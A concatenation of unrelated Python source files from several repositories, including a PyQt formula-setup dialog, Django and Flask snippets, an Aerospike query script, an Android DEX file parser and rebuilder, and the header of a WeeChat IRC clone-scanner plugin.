sys.path.append('../pjrd')
from pjrd.helpers import test, dbConnection
from pjrd.formulaEditor import formulaEditorDialog
os.environ['QT_MAC_WANTS_LAYER'] = '1'
class formulaSetupDialog(QDialog):
def __init__(self, mainWindow):
super(formulaSetupDialog, self).__init__()
self.mainWindow = mainWindow
self.setupUi(self)
self.setupLogic()
def setupUi(self, formulaSetupDialog):
if not formulaSetupDialog.objectName():
formulaSetupDialog.setObjectName(u"formulaSetupDialog")
formulaSetupDialog.resize(672, 419)
sizePolicy = QSizePolicy(QSizePolicy.Maximum, QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(formulaSetupDialog.sizePolicy().hasHeightForWidth())
formulaSetupDialog.setSizePolicy(sizePolicy)
formulaSetupDialog.setMaximumSize(QSize(678, 419))
self.verticalLayout = QVBoxLayout(formulaSetupDialog)
self.verticalLayout.setObjectName(u"verticalLayout")
self.dialogHeaderLabel = QLabel(formulaSetupDialog)
self.dialogHeaderLabel.setObjectName(u"dialogHeaderLabel")
font = QFont()
font.setPointSize(13)
self.dialogHeaderLabel.setFont(font)
self.dialogHeaderLabel.setAutoFillBackground(True)
self.dialogHeaderLabel.setAlignment(Qt.AlignCenter)
self.verticalLayout.addWidget(self.dialogHeaderLabel)
self.line_2 = QFrame(formulaSetupDialog)
self.line_2.setObjectName(u"line_2")
self.line_2.setFrameShape(QFrame.HLine)
self.line_2.setFrameShadow(QFrame.Sunken)
self.verticalLayout.addWidget(self.line_2)
self.headerFrame = QFrame(formulaSetupDialog)
self.headerFrame.setObjectName(u"headerFrame")
sizePolicy1 = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Minimum)
sizePolicy1.setHorizontalStretch(0)
sizePolicy1.setVerticalStretch(0)
sizePolicy1.setHeightForWidth(self.headerFrame.sizePolicy().hasHeightForWidth())
self.headerFrame.setSizePolicy(sizePolicy1)
self.headerFrame.setFrameShape(QFrame.StyledPanel)
self.horizontalLayout_2 = QHBoxLayout(self.headerFrame)
self.horizontalLayout_2.setObjectName(u"horizontalLayout_2")
self.revisionPromptLabel = QLabel(self.headerFrame)
self.revisionPromptLabel.setObjectName(u"revisionPromptLabel")
self.horizontalLayout_2.addWidget(self.revisionPromptLabel)
self.headerRadioBtnContainer = QWidget(self.headerFrame)
self.headerRadioBtnContainer.setObjectName(u"headerRadioBtnContainer")
self.horizontalLayout = QHBoxLayout(self.headerRadioBtnContainer)
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.newFormulaRadioBtn = QRadioButton(self.headerRadioBtnContainer)
self.newFormulaRadioBtn.setObjectName(u"newFormulaRadioBtn")
self.horizontalLayout.addWidget(self.newFormulaRadioBtn)
self.revisionRadioBtn = QRadioButton(self.headerRadioBtnContainer)
self.revisionRadioBtn.setObjectName(u"revisionRadioBtn")
self.horizontalLayout.addWidget(self.revisionRadioBtn)
self.horizontalLayout_2.addWidget(self.headerRadioBtnContainer)
self.verticalLayout.addWidget(self.headerFrame)
self.bodyContainerWidget = QWidget(formulaSetupDialog)
self.bodyContainerWidget.setObjectName(u"bodyContainerWidget")
self.horizontalLayout_4 = QHBoxLayout(self.bodyContainerWidget)
self.horizontalLayout_4.setObjectName(u"horizontalLayout_4")
self.newFormulaContainerFrame = QFrame(self.bodyContainerWidget)
self.newFormulaContainerFrame.setObjectName(u"newFormulaContainerFrame")
self.newFormulaContainerFrame.setFrameShape(QFrame.StyledPanel)
self.verticalLayout_3 = QVBoxLayout(self.newFormulaContainerFrame)
self.verticalLayout_3.setObjectName(u"verticalLayout_3")
self.formulaContainerLabel = QLabel(self.newFormulaContainerFrame)
self.formulaContainerLabel.setObjectName(u"formulaContainerLabel")
self.formulaContainerLabel.setAlignment(Qt.AlignCenter)
self.verticalLayout_3.addWidget(self.formulaContainerLabel)
self.formulaNamePromptLabel = QLabel(self.newFormulaContainerFrame)
self.formulaNamePromptLabel.setObjectName(u"formulaNamePromptLabel")
self.verticalLayout_3.addWidget(self.formulaNamePromptLabel)
self.formulaNameLineEdit = QLineEdit(self.newFormulaContainerFrame)
self.formulaNameLineEdit.setObjectName(u"formulaNameLineEdit")
self.verticalLayout_3.addWidget(self.formulaNameLineEdit)
self.categoryLabel1 = QLabel(self.newFormulaContainerFrame)
self.categoryLabel1.setObjectName(u"categoryLabel1")
self.verticalLayout_3.addWidget(self.categoryLabel1)
self.newCategoryComboBox = QComboBox(self.newFormulaContainerFrame)
self.newCategoryComboBox.setObjectName(u"newCategoryComboBox")
self.newCategoryComboBox.setEditable(True)
self.verticalLayout_3.addWidget(self.newCategoryComboBox)
self.verticalSpacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)
self.verticalLayout_3.addItem(self.verticalSpacer)
self.horizontalSpacer_2 = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.verticalLayout_3.addItem(self.horizontalSpacer_2)
self.horizontalLayout_4.addWidget(self.newFormulaContainerFrame)
self.revisionContainerFrame = QFrame(self.bodyContainerWidget)
self.revisionContainerFrame.setObjectName(u"revisionContainerFrame")
self.revisionContainerFrame.setFrameShape(QFrame.StyledPanel)
self.verticalLayout_2 = QVBoxLayout(self.revisionContainerFrame)
self.verticalLayout_2.setObjectName(u"verticalLayout_2")
self.revisionContainerLabel = QLabel(self.revisionContainerFrame)
self.revisionContainerLabel.setObjectName(u"revisionContainerLabel")
self.revisionContainerLabel.setAlignment(Qt.AlignCenter)
self.verticalLayout_2.addWidget(self.revisionContainerLabel)
self.categoryLabel2 = QLabel(self.revisionContainerFrame)
self.categoryLabel2.setObjectName(u"categoryLabel2")
self.verticalLayout_2.addWidget(self.categoryLabel2)
self.revisionCategoryComboBox = QComboBox(self.revisionContainerFrame)
self.revisionCategoryComboBox.setObjectName(u"revisionCategoryComboBox")
self.revisionCategoryComboBox.setEditable(False)
self.revisionCategoryComboBox.setInsertPolicy(QComboBox.NoInsert)
self.verticalLayout_2.addWidget(self.revisionCategoryComboBox)
self.revisedFormulaPromptLabel = QLabel(self.revisionContainerFrame)
self.revisedFormulaPromptLabel.setObjectName(u"revisedFormulaPromptLabel")
self.verticalLayout_2.addWidget(self.revisedFormulaPromptLabel)
self.formulasToDateComboBox = QComboBox(self.revisionContainerFrame)
self.formulasToDateComboBox.setObjectName(u"formulasToDateComboBox")
self.formulasToDateComboBox.setEditable(True)
self.formulasToDateComboBox.setInsertPolicy(QComboBox.NoInsert)
self.verticalLayout_2.addWidget(self.formulasToDateComboBox)
self.previousVersionLabel = QLabel(self.revisionContainerFrame)
self.previousVersionLabel.setObjectName(u"previousVersionLabel")
self.verticalLayout_2.addWidget(self.previousVersionLabel)
self.previousVersionPlaceholderLabel = QLabel(self.revisionContainerFrame)
self.previousVersionPlaceholderLabel.setObjectName(u"previousVersionPlaceholderLabel")
self.verticalLayout_2.addWidget(self.previousVersionPlaceholderLabel)
self.horizontalSpacer = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.verticalLayout_2.addItem(self.horizontalSpacer)
self.horizontalLayout_4.addWidget(self.revisionContainerFrame)
self.verticalLayout.addWidget(self.bodyContainerWidget)
self.buttonBox = QDialogButtonBox(formulaSetupDialog)
self.buttonBox.setObjectName(u"buttonBox")
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)
self.verticalLayout.addWidget(self.buttonBox)
self.retranslateUi(formulaSetupDialog)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.close)
        # both panes start disabled until a radio button is selected
self.revisionContainerFrame.setDisabled(True)
self.newFormulaContainerFrame.setDisabled(True)
        # enable only the pane matching the selected radio button
self.revisionRadioBtn.toggled.connect(self.newFormulaContainerFrame.setDisabled)
self.revisionRadioBtn.toggled.connect(self.revisionContainerFrame.setEnabled)
self.newFormulaRadioBtn.toggled.connect(self.revisionContainerFrame.setDisabled)
self.newFormulaRadioBtn.toggled.connect(self.newFormulaContainerFrame.setEnabled)
QMetaObject.connectSlotsByName(formulaSetupDialog)
# setupUi
def retranslateUi(self, formulaSetupDialog):
formulaSetupDialog.setWindowTitle(QCoreApplication.translate("formulaSetupDialog", u"Setup", None))
self.dialogHeaderLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"Formula Setup", None))
self.revisionPromptLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"Is this a revision of a previous formula, or an entirely new formula?", None))
self.newFormulaRadioBtn.setText(QCoreApplication.translate("formulaSetupDialog", u"New Formula", None))
self.revisionRadioBtn.setText(QCoreApplication.translate("formulaSetupDialog", u"Revision", None))
self.formulaContainerLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"New Formula", None))
self.formulaNamePromptLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"What is the new formula name?", None))
self.categoryLabel1.setText(QCoreApplication.translate("formulaSetupDialog", u"Category", None))
self.revisionContainerLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"Revision", None))
self.categoryLabel2.setText(QCoreApplication.translate("formulaSetupDialog", u"Category", None))
self.revisedFormulaPromptLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"Select formula to be revised", None))
self.previousVersionLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"Previous Version", None))
self.previousVersionPlaceholderLabel.setText("")
# retranslateUi
def setupLogic(self):
"""
-----------------------------
Purpose:
- Event setup, QModel data fill
Arguments:
- None
Return Value:
- None
"""
# creates the item models for the category boxes
categoryModel = QStandardItemModel()
with dbConnection('FormulaSchema').cursor() as cursor:
cursor.execute('SELECT DISTINCT category_name, category.category_id FROM formula INNER JOIN category ON formula.formula_category_id = category.category_id')
categories = cursor.fetchall()
for category in categories:
categoryItem = QStandardItem()
categoryItem.setText(category['category_name'])
categoryItem.setData(category, Qt.UserRole)
categoryModel.appendRow(categoryItem)
self.newCategoryComboBox.setModel(categoryModel)
self.revisionCategoryComboBox.setModel(categoryModel)
self.revisionCategoryComboBox.setCurrentIndex(-1)
# signal setup
self.revisionCategoryComboBox.currentIndexChanged.connect(self.comboBoxUpdate)
self.formulasToDateComboBox.currentIndexChanged.connect(self.updatePlaceholderLabel)
def comboBoxUpdate(self):
"""
-----------------------------
Purpose:
        - Fill the formulas-to-date combo box when the category selection changes
Arguments:
- None
Return Value:
- None
"""
revisionComboboxSelection = self.revisionCategoryComboBox.itemData(self.revisionCategoryComboBox.currentIndex(), Qt.UserRole)
if revisionComboboxSelection is None:
return
else:
categoryID = revisionComboboxSelection['category_id']
if categoryID is None:
return
prevFormulasModel = QStandardItemModel()
blankItem = QStandardItem()
blankItem.setText('SELECT')
blankItem.setEditable(False)
blankItem.setData(0, Qt.UserRole)
prevFormulasModel.appendRow(blankItem)
        # fill the combo box with formulas in the selected category
with dbConnection('FormulaSchema').cursor() as cursor:
cursor.execute('SELECT formula.formula_id, formula_name, formula.version_number, formula.formula_category_id, formula.version_of_id, category.category_name, category.category_id FROM formula LEFT JOIN category ON category.category_id = formula.formula_category_id WHERE formula.formula_category_id = %s', (categoryID,))
formulas = cursor.fetchall()
for formula in formulas:
formulaItem = QStandardItem()
formulaItem.setText(formula['formula_name'].title())
formulaItem.setData(formula, Qt.UserRole)
prevFormulasModel.appendRow(formulaItem)
self.formulasToDateComboBox.setModel(prevFormulasModel)
# updates the version number label
def updatePlaceholderLabel(self):
"""
-----------------------------
Purpose:
- Updates the version number label
Arguments:
- None
Return Value:
- None
"""
itemData = self.formulasToDateComboBox.itemData(self.formulasToDateComboBox.currentIndex(), Qt.UserRole)
if itemData == 0 or itemData is None:
return
versionNumber = itemData['version_number']
if versionNumber:
self.previousVersionPlaceholderLabel.setText(str(versionNumber))
else:
self.previousVersionPlaceholderLabel.setText('None')
# form accept
def accept(self):
"""
-----------------------------
Purpose:
- Method for calling the Formula Editor window
Arguments:
- None
Return Value:
- None
"""
# if neither new formula or revision is indicated, throws an error message and returns
        if not self.revisionRadioBtn.isChecked() and not self.newFormulaRadioBtn.isChecked():
msg = QMessageBox()
msg.setText('Please indicate whether this formula is new or a revision/iteration')
msg.exec_()
return
else:
isRevision = self.revisionRadioBtn.isChecked()
            if not isRevision:
# if the formula is new but no name was inputted
                if not self.formulaNameLineEdit.text():
msg = QMessageBox()
msg.setText('Input a formula name to continue')
msg.exec_()
return
# if everything goes right
else:
name = self.formulaNameLineEdit.text().title()
formulaEditor = formulaEditorDialog(self.mainWindow, formulaName = name, revision = False, category = self.newCategoryComboBox.currentText())
self.close()
formulaEditor.exec_()
else:
# if formula is a revision, but no previous formula was chosen
if self.formulasToDateComboBox.currentIndex() == -1:
msg = QMessageBox()
msg.setText('Select a previous formula that you are revising')
msg.exec_()
return
# if everything goes right
else:
prevID = self.formulasToDateComboBox.currentData(Qt.UserRole)['version_number']
prevName = self.formulasToDateComboBox.currentText().title()
formulaEditor = formulaEditorDialog(self.mainWindow, formulaName = prevName, revision = isRevision, prevRevisionID = prevID, category = self.revisionCategoryComboBox.currentText())
formulaEditor.exec_()
self.close()
'''
app = QApplication(sys.argv)
gui = formulaSetupDialog(app)
gui.show()
sys.exit(app.exec_())
#test(formulaSetupDialog)'''
# File: dienstplan/dienste/admin.py (repo: MikeTsenatek/DienstplanV2, license: MIT)
from django.contrib import admin
# Register your models here.
from .models import DpDienste,DpBesatzung
class BesatzungInline(admin.TabularInline):
model = DpBesatzung
extra = 0
class DiensteAdmin(admin.ModelAdmin):
list_display = ('tag', 'schicht', 'ordner', 'ordner_name')
list_filter = ('ordner__dienstplan', 'ordner__jahr', 'ordner__monat', 'tag')
inlines = [BesatzungInline]
admin.site.register(DpDienste, DiensteAdmin)
# File: query.py (repo: IntimateMerger/dockerfile-aql, license: Apache-2.0)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import time
import aerospike
from aerospike import predicates as p
if __name__ == "__main__":
if len(sys.argv) == 6:
as_host = str(sys.argv[1])
ns_name = str(sys.argv[2])
st_name = str(sys.argv[3])
key_name = str(sys.argv[4])
days = int(sys.argv[5])
now = int(time.time())
min_ts = now - (60 * 60 * 24 * days)
max_ts = 2147483647 # 2038-01-19 12:14:07
cl = aerospike.client({'hosts': [(as_host, 3000)]}).connect()
query = cl.query(ns_name, st_name)
query.select(key_name)
query.where(p.between("ts", min_ts, max_ts))
        def echo(record):
            # aerospike invokes the callback with a (key, meta, bins) tuple;
            # unpacking here avoids the Python-2-only tuple-parameter syntax
            key, meta, bins = record
            print(bins[key_name])
query.foreach(echo, {"timeout": 0})
else:
print("usage: python -u query.py [hostname] [namespace] [set] [key] [days]")
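The bounds handed to the between-predicate above are plain epoch arithmetic; a dependency-free sketch of the same computation (`scan_window` is a hypothetical helper, not part of this script):

```python
import time

def scan_window(days, now=None):
    """Return (min_ts, max_ts) covering the last `days` days, capped at
    the 32-bit epoch limit used above (2038-01-19 12:14:07 UTC)."""
    if now is None:
        now = int(time.time())
    min_ts = now - (60 * 60 * 24 * days)
    max_ts = 2147483647
    return min_ts, max_ts

print(scan_window(7, now=1000000000))
```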
# File: parallel.py (repo: ambimanus/demand-response-cohda, license: MIT)
# coding=utf-8
from __future__ import division
import sys
import os
import pickle
from configuration import Configuration
import main
def run(cfg_dict):
cfg = main.main(Configuration(**cfg_dict))
fn = str(os.path.join(cfg.basepath, '.'.join(
('cfg', cfg.title, str(cfg.seed), 'pickle'))))
with open(fn, 'w') as f:
pickle.dump(cfg, f)
if __name__ == '__main__':
runs = 10
params = []
for lag in range(0, 6):
for seed in range(runs):
cfg_dict = {
'title': 'lag%02d' % lag,
'seed': seed,
'n': 1500,
'it': 1441,
'lag': lag,
}
params.append(cfg_dict)
if 'SGE_TASK_ID' in os.environ:
# HERO HPC cluster
run(params[int(os.environ['SGE_TASK_ID'])-1])
elif 'PARALLEL_SEQ' in os.environ:
# GNU parallel
run(params[int(os.environ['PARALLEL_SEQ'])-1])
else:
# sequential
start, stop = 0, len(params)
if len(sys.argv) == 2:
            print(len(params))
sys.exit(0)
elif len(sys.argv) == 3:
start, stop = int(sys.argv[1]), int(sys.argv[2])
if start >= len(params):
sys.exit(0)
for p in params[start:stop]:
run(p)
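The dispatch above works because SGE task arrays and GNU parallel both export a 1-based slot index in the environment; the selection logic can be distilled into a small helper for illustration (`pick_task` is hypothetical, not part of the script):

```python
import os

def pick_task(params, environ=None):
    """Return the parameter set for this worker slot, or None to signal
    that the caller should fall back to sequential processing."""
    if environ is None:
        environ = os.environ
    for var in ('SGE_TASK_ID', 'PARALLEL_SEQ'):
        if var in environ:
            # both schedulers number slots starting at 1
            return params[int(environ[var]) - 1]
    return None

print(pick_task(['a', 'b', 'c'], environ={'PARALLEL_SEQ': '2'}))
```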
# File: app/config/secure.py (repo: xiaojieluo/flask_restapi_template, license: Apache-2.0)
SQLALCHEMY_DATABASE_URI = \
'mysql+cymysql://root:00000000@localhost/ucar'
SECRET_KEY = '***'
SQLALCHEMY_TRACK_MODIFICATIONS = True
MINA_APP = {
'AppID': '***',
'AppSecret': '***'
}
# File: onepanman_api/views/api/code.py (repo: Capstone-onepanman/api-server, license: MIT)
import django_filters
from rest_framework import viewsets
from onepanman_api.models import Code
from onepanman_api.serializers.code import CodeSerializer
from rest_framework.mixins import ListModelMixin
from rest_framework.response import Response
from rest_framework.views import APIView
class CodeViewSet(viewsets.ModelViewSet):
queryset = Code.objects.all()
serializer_class = CodeSerializer
filter_backends = (django_filters.rest_framework.DjangoFilterBackend,)
filter_fields = ('author', 'problem', 'available_game')
def create(self, request, *args, **kwargs):
data = super().create(request, *args, **kwargs)
        # TODO: dispatch the celery task here
return Response(data)
class MyCodeView(APIView):
def get(self, request, version):
queryset = Code.objects.all().filter(author=request.user.pk)
serializer = CodeSerializer(queryset, many=True)
return Response(serializer.data)
# File: dex/dexinfo.py (repo: callmejacob/dexfactory, license: BSD-2-Clause)
# -- coding: utf-8 --
import numpy as np
import hashlib
import zlib
from section import *
class DexInfo(object):
    """
    Dex file information
    """
    def __init__(self, dex_path, dex_bytes = None):
        """
        Initialization
        dex_path: path of the dex file
        self.dex_bytes: byte array of the dex file
        self.header: header information item
        """
        # record the file path
        self.dex_path = dex_path
        # obtain the dex byte array
        if dex_bytes is None:
            self.dex_bytes = np.fromfile(dex_path, dtype=np.ubyte)
        else:
            self.dex_bytes = dex_bytes
        # context
        self.context = Context()
        # decode the section list
        self.decode()
    def decode(self):
        """
        Decode all sections.
        """
        # 1. get the header info
        header = HeaderSection(self.context, self.dex_bytes, 1, 0).getItem(0)
        # 2. get the map list
        map_item_list = MapItemListSection(self.context, self.dex_bytes, 1, header.map_off)
        # 3. parse every section field
        for item in map_item_list.getItemDataList():
            section_type = item.getSectionType()
            section_item_size = item.getSectionItemSize()
            section_off = item.getSectionOff()
            section_class = section_class_map[section_type]
            if section_class:
                # print section_class
                section = section_class(self.context, self.dex_bytes, section_item_size, section_off)
        # 4. convert [off ---> id]
        self.convertOffToIdForAllSections()
        # 5. convert [id ---> item]
        self.convertIdToItemForAllSections()
        # 6. record the header info
        self.header_section = self.context.getSection(TYPE_HEADER_ITEM)
        self.header = self.header_section.getItem(0)
    def encode(self):
        """
        Encode all sections.
        """
        # 1. re-encode all sections
        self.encodeAllSections()
        # 2. recalculate the section offsets and write them into the map_list and header sections
        self.genAllSectionsOffAndSize()
        # 3. convert [item ---> id]
        self.convertItemToIdForAllSections()
        # 4. convert [id ---> off]
        self.convertIdToOffForAllSections()
        # 5. re-encode the adjusted sections and copy them into the byte array
        self.encodeAllSections()
        self.copyAllSections()
        # 6. recalculate the sig and checksum
        self.recalSigAndChecksum()
    def encodeAllSections(self):
        """
        Encode every section in the list.
        """
        section_list = self.context.getSectionList()
        # record the original hex strings
        src_hex_list = []
        for section in section_list:
            src_hex_list.append(section.tohexstring())
        # re-encode each section
        for section in section_list:
            section.encode()
        section_list = self.context.getSectionList()
        # record the re-encoded hex strings
        dst_hex_list = []
        for section in section_list:
            dst_hex_list.append(section.tohexstring())
        # diff (debug output, kept disabled below)
# string = 'encode_all_sections diff {\n'
# string += 'len: %r\n' % (len(src_hex_list) == len(dst_hex_list))
# for i in range(len(src_hex_list)):
# src_hex_bytes = src_hex_list[i]
# dst_hex_bytes = dst_hex_list[i]
# section = section_list[i]
# section_desc = type_desc_map[section.section_type]
# diff_result = diffBytes(src_hex_bytes, dst_hex_bytes)
# string += '-' * 100 + '\n'
# string += '%s: %r\n' % (section_desc, diff_result)
# if True:
# string += 'src: [%s]\n\n' % src_hex_bytes
# string += 'dst: [%s]\n' % dst_hex_bytes
# string += '-' * 100 + '\n'
# string += '}\n'
# print string
def genAllSectionsOffAndSize(self):
        """
        Update the offset and size of every section.
        """
map_list_section = self.context.getSection(TYPE_MAP_LIST)
header = self.header
section_list = self.context.getSectionList()
section_size_off_map = {}
for section_type in type_list:
section_size_off_map[section_type] = None
        # compute each section's offset
section_off = 0
for section in section_list:
section_size_off_map[section.section_type] = [section.getItemSize(), section_off]
# print '%.4x: [%.4x %.4x %.4d] (%s)' % (section.section_type, section.getItemSize(), section_off, section.getBytesSize(), type_desc_map[section.section_type])
# print 'pre section_off: %.4x bytes_size: %.4d' % (section_off, section.getBytesSize())
section_off += section.getBytesSize()
# print 'next section_off: %.4x bytes_size: %.4d' % (section_off, section.getBytesSize())
file_size = section_off
        if file_size % 0x02 != 0:  # keep the data area size even
file_size += 0x01
# print 'file_size: %.4x' % file_size
        # write the results into map_list_section
for map_item in map_list_section.getItemDataList():
section_type = map_item.getSectionType()
section_item_size, section_item_off = section_size_off_map[section_type]
map_item.setSectionItemSize(section_item_size)
map_item.setSectionOff(section_item_off)
map_list_section.encode()
        # write the results into the header
# print 'Before gen header:\n', header.tostring()
header.setFileSize(file_size)
section_item_size, section_off = section_size_off_map[TYPE_MAP_LIST]
header.setMapOff(section_off)
section_item_size, section_off = section_size_off_map[TYPE_STRING_ID_ITEM]
header.setStringIdInfo(section_item_size, section_off)
section_item_size, section_off = section_size_off_map[TYPE_TYPE_ID_ITEM]
header.setTypeIdInfo(section_item_size, section_off)
section_item_size, section_off = section_size_off_map[TYPE_PROTO_ID_ITEM]
header.setProtoIdInfo(section_item_size, section_off)
section_item_size, section_off = section_size_off_map[TYPE_FIELD_ID_ITEM]
header.setFieldIdInfo(section_item_size, section_off)
section_item_size, section_off = section_size_off_map[TYPE_METHOD_ID_ITEM]
header.setMethodInfo(section_item_size, section_off)
section_item_size, class_def_section_off = section_size_off_map[TYPE_CLASS_DEF_ITEM]
header.setClassDefInfo(section_item_size, class_def_section_off)
class_def_section = self.context.getSection(TYPE_CLASS_DEF_ITEM)
data_area_off = class_def_section_off + class_def_section.getBytesSize()
data_area_size = file_size - data_area_off
header.setDataInfo(data_area_size, data_area_off)
# print 'After gen header:\n', header.tostring()
def copyAllSections(self):
        """
        Copy every section into one contiguous byte array.
        """
section_list = self.context.getSectionList()
header = self.header
        # reallocate the byte array to the new file size
bytes = createBytes(header.file_size)
        # copy each section in turn
section_off = 0
for section in section_list:
section_bytes_size = section.getBytesSize()
bytes[section_off:section_off+section_bytes_size] = section.getBytes()
section_off += section_bytes_size
        # compare the byte arrays (debug, disabled)
# diff_result = diffBytes(self.dex_bytes, bytes)
# print 'after copy_all_sections:\n', diff_result
        # swap in the rebuilt dex byte array
self.dex_bytes = bytes
def printAllSections(self):
        """
        Print every section in the list.
        """
section_list = self.context.getSectionList()
for section in section_list:
if section:
print section.tostring()
def printSection(self, section_type):
        ''' Print the section of the given type '''
section = self.context.getSection(section_type)
if section:
print section.tostring()
def convertOffToIdForAllSections(self):
        ''' Convert file offsets to the related ids '''
section_list = self.context.getSectionList()
for section in section_list:
section.convertOffToId()
def convertIdToOffForAllSections(self):
        ''' Convert ids to the related file offsets '''
section_list = self.context.getSectionList()
for section in section_list:
section.convertIdToOff()
def convertIdToItemForAllSections(self):
        ''' Convert ids to item objects '''
section_list = self.context.getSectionList()
for section in section_list:
section.convertIdToItem()
def convertItemToIdForAllSections(self):
        ''' Convert item objects to ids '''
section_list = self.context.getSectionList()
for section in section_list:
section.convertItemToId()
# if section.section_type == TYPE_PROTO_ID_ITEM:
# print section.tostring()
def getContext(self):
        """
        Get the context object.
        """
return self.context
def save(self, dex_path=None):
        """
        Save the byte array to a file.
        """
if dex_path is None:
dex_path = self.dex_path
if not dex_path is None:
self.dex_bytes.tofile(dex_path)
    def recalSigAndChecksum(self):
        """
        Recompute the signature and checksum.
        """
        dex_bytes = self.dex_bytes
        dex_size = len(dex_bytes)
        # compute the signature (SHA-1 over everything after the first 32 bytes)
        sig = hashlib.sha1(dex_bytes[32:dex_size]).hexdigest()
        self.header.setSignature(bytearray.fromhex(sig))
        # write the sig back into dex_bytes
        self.header_section.encode()
        dex_bytes[0x00:self.header_section.getBytesSize()] = self.header_section.getBytes()
        # compute the checksum (adler32 covers the sig, so the sig must be written first)
        checksum = zlib.adler32(dex_bytes[12:dex_size])
        self.header.setChecksum(convertIntToBytes(checksum))
        # write the checksum back into dex_bytes
        self.header_section.encode()
        dex_bytes[0x00:self.header_section.getBytesSize()] = self.header_section.getBytes()
def tostring(self):
string = ''
section_list = self.context.getSectionList()
for section in section_list:
if section:
string += section.tostring()
return string
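recalSigAndChecksum follows the standard DEX header layout: the adler32 checksum (stored at offset 8) covers bytes 12..EOF, and the SHA-1 signature (stored at offset 12) covers bytes 32..EOF, which is why the signature must be written before the checksum is computed. A dependency-free sketch of the two digests:

```python
import hashlib
import zlib

def dex_signature(dex_bytes):
    """SHA-1 over everything after magic, checksum and signature (offset 32)."""
    return hashlib.sha1(bytes(dex_bytes[32:])).hexdigest()

def dex_checksum(dex_bytes):
    """adler32 over everything after magic and checksum (offset 12)."""
    return zlib.adler32(bytes(dex_bytes[12:])) & 0xFFFFFFFF
```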
# File: launch.py (repo: rugleb/cad, license: MIT)
#!/usr/bin/env python
import sys
from PyQt5.QtWidgets import QApplication
from cad.application import Application
if __name__ == '__main__':
app = QApplication(sys.argv)
workspace = Application()
workspace.show()
sys.exit(app.exec_())
# File: clone_scanner.py (repo: m42e/weechat_scripts, license: MIT)
# -*- coding: utf-8 -*-
#
# Clone Scanner, version 1.3 for WeeChat version 0.3
# Latest development version: https://github.com/FiXato/weechat_scripts
#
# A Clone Scanner that can manually scan channels and
# automatically scans joins for users on the channel
# with multiple nicknames from the same host.
#
# Upon join by a user, the user's host is compared to the infolist of
# already connected users to see if they are already online from
# another nickname. If the user is a clone, it will report it.
# With the '/clone_scanner scan' command you can manually scan a chan.
#
# See /set plugins.var.python.clone_scanner.* for all possible options
# Use the brilliant iset.pl plugin (/weeget install iset) to see what they do
# Or check the sourcecode below.
#
# Example output for an on-join scan result:
# 21:32:46 ▬▬▶ FiXato_Odie (FiXato@FiXato.net) has joined #lounge
# 21:32:46 FiXato_Odie is already on the channel as FiXato!FiXato@FiXato.Net and FiX!FiXaphone@FiXato.net
#
# Example output for a manual scan:
# 21:34:44 fixato.net is online from 3 nicks:
# 21:34:44 - FiXato!FiXato@FiXato.Net
# 21:34:44 - FiX!FiXaphone@FiXato.net
# 21:34:44 - FiXato_Odie!FiXato@FiXato.net
#
## History:
### 2011-09-11: FiXato:
#
# * version 0.1: initial release.
# * Added an on-join clone scan. Any user that joins a channel will be
# matched against users already on the channel.
#
# * version 0.2: manual clone scan
# * Added a manual clone scan via /clone_scanner scan
# you can specify a target channel with:
# /clone_scanner scan #myChannelOnCurrentServer
# or:
# /clone_scanner scan Freenode.#myChanOnSpecifiedNetwork
# * Added completion
#
### 2011-09-12: FiXato:
#
# * version 0.3: Refactor galore
# * Refactored some code. Codebase should be DRYer and clearer now.
# * Manual scan report lists by host instead of nick now.
# * Case-insensitive host-matching
# * Bugfixed the infolist memleak.
# * on-join scanner works again
# * Output examples added to the comments
#
### 2011-09-19
# * version 0.4: Option galore
# * Case-insensitive buffer lookup fix.
# * Made most messages optional through settings.
# * Made on-join alert and clone report key a bit more configurable.
# * Added formatting options for on-join alerts.
# * Added format_message helper method that accepts multiple whitespace-separated weechat.color() options.
# * Added formatting options for join messages
# * Added formatting options for clone reports
# * Added format_from_config helper method that reads the given formatting key from the config
#
# * version 0.5: cs_buffer refactoring
# * dropping the manual cs_create_buffer call in favor for a cs_get_buffer() method
#
### 2012-02-10: FiXato:
#
# * version 0.6: Stop shoving that buffer in my face!
# * The clone_scanner buffer should no longer pop up by itself when you load the script.
# It should only pop up now when you actually a line needs to show up in the buffer.
#
# * version 0.7: .. but please pop it up in my current window when I ask for it
# * Added setting plugins.var.python.clone_scanner.autofocus
# This will autofocus the clone_scanner buffer in the current window if another window isn't
# already showing it, and of course only when the clone_scanner buffer is triggered
#
### 2012-02-10: FiXato:
#
# * version 0.8: .. and only when it is first created..
# * Prevents the buffer from being focused every time there is activity in it and not being shown in a window.
#
### 2012-04-01: FiXato:
#
# * version 0.9: Hurrah for bouncers...
# * Added the option plugins.var.python.clone_scanner.compare_idents
# Set it to 'on' if you don't want people with different idents to be marked as clones.
# Useful on channels with bouncers.
#
### 2012-04-02: FiXato:
#
# * version 1.0: Bugfix
# * Fixed the on-join scanner bug introduced by the 0.9 release.
# I was not properly comparing the new ident@host.name key in all places yet.
# Should really have tested this better ><
#
### 2012-04-03: FiXato:
#
# * version 1.1: Stop being so sensitive!
# * Continuing to fix the on-join scanner bugs introduced by the 0.9 release.
# The ident@host.name dict key wasn't being lowercased for comparison in the on-join scan.
#
# * version 1.2: So shameless!
# * Added shameless advertising for my script through /clone_scanner advertise
#
### 2013-04-09: FiXato:
# * version 1.3: Such a killer rabbit
# * Thanks to Curtis Sorensen aka killerrabbit clone_scanner.py now supports:
# * local channels (&-prefixed)
# * nameless channels (just # or &)
#
## Acknowledgements:
